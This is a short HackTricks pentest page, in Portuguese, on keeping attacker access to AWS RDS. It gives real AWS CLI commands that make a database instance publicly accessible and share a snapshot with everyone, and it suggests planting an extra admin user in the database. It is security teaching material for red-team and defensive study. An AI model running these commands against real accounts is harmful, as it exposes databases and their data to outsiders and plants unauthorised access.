AWS - RDS Persistence

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

RDS

Para mais informações, confira:

AWS - Relational Database (RDS) Enum

Tornar a instância acessível publicamente: `rds:ModifyDBInstance`

Um atacante com esta permissão pode modificar uma instância RDS existente para habilitar a acessibilidade pública.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Criar um usuário administrador dentro do DB

Um atacante poderia criar um usuário dentro do DB para que, mesmo que a senha do usuário master seja modificada, ele não perca o acesso ao banco de dados.

Tornar o snapshot público

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Supporte o HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

PreviousAWS - Lightsail Persistence NextAWS - S3 Persistence

Last updated 3 days ago

RDS

Tornar a instância acessível publicamente: rds:ModifyDBInstance

Criar um usuário administrador dentro do DB

Tornar o snapshot público

RDS

Tornar a instância acessível publicamente: rds:ModifyDBInstance

Criar um usuário administrador dentro do DB

Tornar o snapshot público

Tornar a instância acessível publicamente: `rds:ModifyDBInstance`

Tornar a instância acessível publicamente: `rds:ModifyDBInstance`